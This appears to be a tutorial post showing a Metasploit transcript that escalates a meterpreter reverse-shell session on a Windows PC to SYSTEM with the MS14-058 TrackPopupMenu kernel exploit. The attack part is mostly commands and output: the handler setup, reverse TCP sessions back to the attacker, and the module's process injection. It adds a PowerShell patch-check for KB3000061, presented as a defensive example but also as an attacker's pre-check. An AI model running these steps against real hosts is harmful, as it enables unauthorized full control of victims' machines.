WINDOWS PRIVILEGE ESCALATION EXPLOIT (TRACK_POPUP_MENU)

[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.3:7000
[*] Starting the payload handler…
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 179.197.253.231
[*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: MsTutorial-PC\Ms Tutorial
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
Background session 1? [y/N]

Privilege escalation starts here. getsystem fails because every technique it tries requires an administrator session (note the "/Admin" suffix on each), so the unprivileged session is backgrounded with Ctrl-Z and handed to the MS14-058 (TrackPopupMenu, win32k.sys) local exploit as SESSION 1; the module spawns notepad.exe, injects the exploit and payload into it, and returns a second session as SYSTEM.

msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Launching notepad to host the exploit…
[+] Process 1080 launched.
[*] Reflectively injecting the exploit DLL into 1080…
[*] Injecting exploit into 1080…
[*] Exploit injected. Injecting payload into 1080…
[*] Payload injected. Executing exploit…
[*] Sending stage (957487 bytes) to 192.168.1.4
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:49234) at 2016-02-01 14:17:08 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
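A kernel exploit like this one is all-or-nothing: against a patched win32k.sys the module either fails silently or bluescreens the host, so check the patch state first. From the meterpreter session, sysinfo and run post/multi/recon/local_exploit_suggester give an attacker-side view; the PowerShell below is the defender-side equivalent. It is an added example, not part of the original post, and it assumes the operator is authorized on the hosts queried (here the constructed name MsTutorial-PC from the transcript). MS14-058 was shipped as KB3000061 (CVE-2014-4113 and CVE-2014-4148), which only appears as a discrete hotfix on the 2014-era builds it targeted (Server 2003 through 8.1/2012 R2); later builds with cumulative updates never list it, so a "missing" result there means nothing.

```powershell
# Added example, not from the original post: triage one or more Windows hosts
# for MS14-058 exposure by checking whether KB3000061 is installed.
# Assumptions: authorized access, and a build where the fix ships as a discrete
# KB (Server 2003 .. 8.1/2012 R2). KB3000061 is the MS14-058 update (a known fact).
function Test-MS14058Exposure {
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipeline = $true)]
        [string[]]$ComputerName = $env:COMPUTERNAME
    )
    process {
        foreach ($computer in $ComputerName) {
            try {
                # Win32_OperatingSystem gives the build; anything at or past 10.0
                # uses cumulative updates and will never report this KB.
                $os = Get-CimInstance -ClassName Win32_OperatingSystem `
                        -ComputerName $computer -ErrorAction Stop
                $major = [int]($os.Version.Split('.')[0])

                # Get-HotFix reads Win32_QuickFixEngineering; with
                # SilentlyContinue it simply returns nothing when the KB is absent.
                $fix = Get-HotFix -Id 'KB3000061' -ComputerName $computer `
                        -ErrorAction SilentlyContinue

                $status = if ($major -ge 10) {
                    'Not applicable (cumulative-update build)'
                } elseif ($fix) {
                    'Patched'
                } else {
                    'KB3000061 missing - likely exposed to MS14-058'
                }

                [pscustomobject]@{
                    ComputerName = $computer
                    Caption      = $os.Caption
                    OSVersion    = $os.Version
                    KB3000061    = [bool]$fix
                    InstalledOn  = if ($fix) { $fix.InstalledOn } else { $null }
                    Status       = $status
                }
            } catch {
                # Unreachable host, denied WMI/CIM access, etc.
                [pscustomobject]@{
                    ComputerName = $computer
                    Caption      = $null
                    OSVersion    = $null
                    KB3000061    = $null
                    InstalledOn  = $null
                    Status       = "Error: $($_.Exception.Message)"
                }
            }
        }
    }
}

# Usage (host name taken from the transcript above; authorized access assumed):
Test-MS14058Exposure -ComputerName 'MsTutorial-PC' | Format-Table -AutoSize
```

Run it against the target (locally or over WinRM/DCOM) before selecting the module; a "Patched" result means the exploit above should not be attempted, and a "missing" result on an in-scope build is the condition under which the transcript's second session is obtained.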

By Moisés Oliver
